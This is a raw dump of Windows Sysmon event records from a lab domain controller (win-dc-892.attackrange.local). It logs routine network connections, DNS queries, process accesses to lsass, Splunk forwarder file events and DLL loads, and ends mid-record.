AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58893-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.743{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1win-dc-892.attackrange.local64856-false127.0.0.1win-dc-892.attackrange.local64856- 354300x80000000000000003565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.743{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58893-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.742{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local56439- 354300x80000000000000003563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.741{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local58892-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.741{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58892-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.738{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61493- 354300x80000000000000003560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.736{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49729-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.736{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49729-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.731{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49728-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.731{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49728-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.690{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49727-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49727-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49726-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49726-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.685{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49725-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.685{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49725-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.656{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49724-false10.0.1.12-8089- 354300x80000000000000003549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.652{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49723-false10.0.1.12-8089- 354300x80000000000000003548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.564{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.64-53863-false10.0.1.14win-dc-892.attackrange.local5986- 354300x80000000000000003547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:26.958{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.64-53862-false10.0.1.14win-dc-892.attackrange.local5986- 22542200x80000000000000003546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.755{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.745{266CAFBE-646A-6064-0B00-00000000AE01}856DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.695{266CAFBE-646A-6064-0B00-00000000AE01}856win-dc-892.attackrange.local010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.695{266CAFBE-646A-6064-0B00-00000000AE01}856win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;C:\Windows\System32\lsass.exe 22542200x80000000000000003542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:26.221{266CAFBE-646C-6064-1500-00000000AE01}1316win-dc-8921460-C:\Windows\System32\svchost.exe 23542300x80000000000000003541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E21185358033116E48B29342A995EF74,SHA256=FD5A785B26E7A68B6096E323E54DF18EC1042EFA207177B487F23C2848B6B3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F4A85495CEEFF2B6FECBF76FBC0C6813,SHA256=DF0A76CCCC82A772E4609AF171974746F7590DAD095D8312D6D6A0BF13083366,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22967699C2338737DE002970A6B9C310,SHA256=328F88A02F0411DB4ED223BD55489BE77E67A102D140B2B1DC7378F2756E2D1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8A08FB95FB863521F157C05D671F2252,SHA256=424FC903330E7214CC6D72FF8E81C73F20187F654369590E5FDC56E39E73D4B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DNS ServerMD5=8E5A60051D99C3B11F2CEE547BD3F774,SHA256=FF3195FCE88CA2BB00442F42134CEED3BB6585EA057C468C9BF876C656D7B56B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.002{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.002{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:28.002{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000003611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.973{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58077-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.973{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58077-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.828{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58076-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.828{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58076-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 22542200x80000000000000003607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.801{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.793{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.785{266CAFBE-646A-6064-0B00-00000000AE01}856ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.775{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 23542300x80000000000000003603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:29.330{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D4EE2B412EC70AD8A0BC872BA2F57C4C,SHA256=019D82DD635461287D21B6CBEE29274289F45B013CA0553DDDA1D9457C2BE917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:29.330{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DNS ServerMD5=A5FD6A465126EE40CB06BE9C127F3FE0,SHA256=29E018520930AFE82749E6A100B8E21060F62C24438AA6D4240B20B6BC4AF5AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.813{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58075-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.813{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58075-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.799{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58074-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.799{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58074-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.796{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local58073-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.796{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58073-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.795{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54464- 354300x80000000000000003594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.794{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55868- 734700x80000000000000003613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.174{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.3503 (rs1_release.200131-0410)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=4B455FA2A15BE4C278D0D655A7EA9543,SHA256=1C04ABE14400CC4175704B08D008454820BBF14BFECE1934A82756A6037E681B,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 734700x80000000000000003612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.549{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.3503 (rs1_release.200131-0410)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=4B455FA2A15BE4C278D0D655A7EA9543,SHA256=1C04ABE14400CC4175704B08D008454820BBF14BFECE1934A82756A6037E681B,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 23542300x80000000000000003614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.627{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCD9D0B157A435343F4AEC5B9857B73B,SHA256=FE60D4747B2D2B10EB469CB39EFAE1D1ED984A300A9BE29200ED183A964B14A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:34.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=FA2997C748A12903B902DB4BA13A31B5,SHA256=B7E15E9BBFFAB09BC1D05F7EEC868A6865034BC1C0B75486B804D890B29094F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:34.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE79EFC4ECA9885F57D10B0229F4E1F5,SHA256=F09438DC46CEAF8260E148B329CCE5CAC51D3B97D7685BADCF4D461EACC12C5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:34.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=C14C7F7EF4E5190AD9926D274E795681,SHA256=1998D7A8CB0081120B54BD052BBA01D6B616C9CEE96B21CFE6FB08E58C6351DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:34.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E21185358033116E48B29342A995EF74,SHA256=FD5A785B26E7A68B6096E323E54DF18EC1042EFA207177B487F23C2848B6B3C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.283{266CAFBE-646C-6064-1500-00000000AE01}13161696C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000003630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.604{266CAFBE-647D-6064-3400-00000000AE01}2760pki.intel.com0type: 5 certificates.intel.com.edgesuite.net;type: 5 a243.d.akamai.net;::ffff:184.25.50.179;::ffff:184.25.50.185;C:\Windows\sysmon64.exe 354300x80000000000000003629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.768{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58082-false151.139.128.14-80http 354300x80000000000000003628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.724{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63746- 354300x80000000000000003627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.629{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58081-false151.139.128.14-80http 22542200x80000000000000003626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.503{266CAFBE-647D-6064-3400-00000000AE01}2760ocsp.intel.com0type: 5 ocsp.comodoca.com;::ffff:151.139.128.14;C:\Windows\sysmon64.exe 354300x80000000000000003625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 